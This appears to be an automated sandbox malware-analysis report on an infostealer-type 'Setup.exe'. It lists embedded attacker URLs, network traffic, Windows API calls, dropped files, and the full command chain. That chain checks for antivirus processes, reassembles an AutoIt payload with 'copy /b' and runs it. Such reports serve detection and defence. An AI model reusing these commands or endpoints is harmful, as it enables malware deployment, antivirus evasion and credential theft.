Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Setup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp, Setup.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: Setup.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: Setup.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Preceding.com, 0000000D.00000000.2239356108.0000000000355000.00000002.00000001.01000000.00000007.sdmp, Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Setup.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Setup.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Preceding.com, 0000000D.00000003.2685961924.0000000004984000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/
Source: Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp, Preceding.com, 0000000D.00000002.4649081221.00000000013DA000.00000004.00000010.00020000.00000000.sdmp, Preceding.com, 0000000D.00000002.4650275127.0000000004A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txte
Source: Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/n
Source: Preceding.com, 0000000D.00000002.4649634757.0000000001766000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPK
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Preceding.com, 0000000D.00000002.4650275127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp, Preceding.com, 0000000D.00000002.4649778438.000000000183C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enthuasticsa.cyou/
Source: Preceding.com, 0000000D.00000002.4650275127.0000000004A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://enthuasticsa.cyou/api
Source: Preceding.com, 0000000D.00000002.4650275127.0000000004A2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://enthuasticsa.cyou/pi
Source: Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enthuasticsa.cyou/s
Source: Preceding.com, 0000000D.00000002.4649634757.0000000001766000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enthuasticsa.cyou:443/api
Source: Preceding.com, 0000000D.00000002.4649634757.0000000001766000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://enthuasticsa.cyou:443/apil
Source: Preceding.com, 0000000D.00000002.4649778438.00000000018D6000.00000004.00000020.00020000.00000000.sdmp, Preceding.com, 0000000D.00000002.4649778438.000000000183C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop/int_clp_sha.txt
Source: Preceding.com, 0000000D.00000002.4649778438.000000000183C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop/int_clp_sha.txt413
Source: Preceding.com, 0000000D.00000003.2686964944.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Preceding.com, 0000000D.00000003.2686964944.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Preceding.com, 0000000D.00000003.2637301145.0000000004EAF000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Enlarge.9.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Setup.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: Enlarge.9.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Preceding.com, 0000000D.00000003.2659337659.00000000049B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Preceding.com, 0000000D.00000003.2686964944.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Preceding.com, 0000000D.00000003.2686964944.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Preceding.com, 0000000D.00000003.2686964944.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.6:49993 version: TLS 1.2

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002FF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

13_2_002FF7C7

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002FF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

13_2_002FF55C

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_00319FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

13_2_00319FD2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_0029FFE0 CloseHandle,NtProtectVirtualMemory,

13_2_0029FFE0

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002F4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

13_2_002F4763

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002E1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

13_2_002E1B4D

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002EF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		13_2_002EF20D

Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\OwenWare	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\JewsUsgs	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\PerceivedNode	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\RemainScoring	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\RollerCookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\ProspectHereby	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\CompiledRhythm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File created: C:\Windows\SomaDonors	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A8017	13_2_002A8017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_0029E144	13_2_0029E144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_0028E1F0	13_2_0028E1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002BA26E	13_2_002BA26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002822AD	13_2_002822AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A22A2	13_2_002A22A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_0029C624	13_2_0029C624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002BE87F	13_2_002BE87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_0030C8A4	13_2_0030C8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002F2A05	13_2_002F2A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002B6ADE	13_2_002B6ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002E8BFF	13_2_002E8BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_0029CD7A	13_2_0029CD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002ACE10	13_2_002ACE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002B7159	13_2_002B7159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_00289240	13_2_00289240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_00315311	13_2_00315311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002896E0	13_2_002896E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A1704	13_2_002A1704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A1A76	13_2_002A1A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_00289B60	13_2_00289B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A7B8B	13_2_002A7B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A1D20	13_2_002A1D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A7DBA	13_2_002A7DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A1FE7	13_2_002A1FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: String function: 0029FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: String function: 002A0DA0 appears 46 times

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/22@3/2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002F41FA GetLastError,FormatMessageW,

13_2_002F41FA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002E2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		13_2_002E2010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002E1A0B AdjustTokenPrivileges,CloseHandle,		13_2_002E1A0B

Source: C:\Users\user\Desktop\Setup.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002EDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

13_2_002EDD87

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002F3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

13_2_002F3A0E

Source: C:\Users\user\Desktop\Setup.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Reproduce

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03

Source: C:\Users\user\Desktop\Setup.exe

File created: C:\Users\user\AppData\Local\Temp\nsl7AA5.tmp

Jump to behavior

Source: Setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Preceding.com, 0000000D.00000003.2675396358.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Preceding.com, 0000000D.00000003.2675253600.000000000497C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Setup.exe	Virustotal: Detection: 8%
Source: Setup.exe	ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\Setup.exe

File read: C:\Users\user\Desktop\Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Shoppercom Shoppercom.cmd & Shoppercom.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 598591
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Advertise
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Findarticles" Stockings
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 598591\Preceding.com + Expiration + Rights + Addiction + Intensity + Surfing + Jam + Dramatically + Human + Enlarge 598591\Preceding.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cd + ..\Invite + ..\Reproduce + ..\Greensboro + ..\Nervous + ..\Few + ..\Since o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com Preceding.com o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Shoppercom Shoppercom.cmd & Shoppercom.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 598591	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Advertise	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Findarticles" Stockings	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 598591\Preceding.com + Expiration + Rights + Addiction + Intensity + Surfing + Jam + Dramatically + Human + Enlarge 598591\Preceding.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cd + ..\Invite + ..\Reproduce + ..\Greensboro + ..\Nervous + ..\Few + ..\Since o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com Preceding.com o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: usp10.dll	Jump to behavior
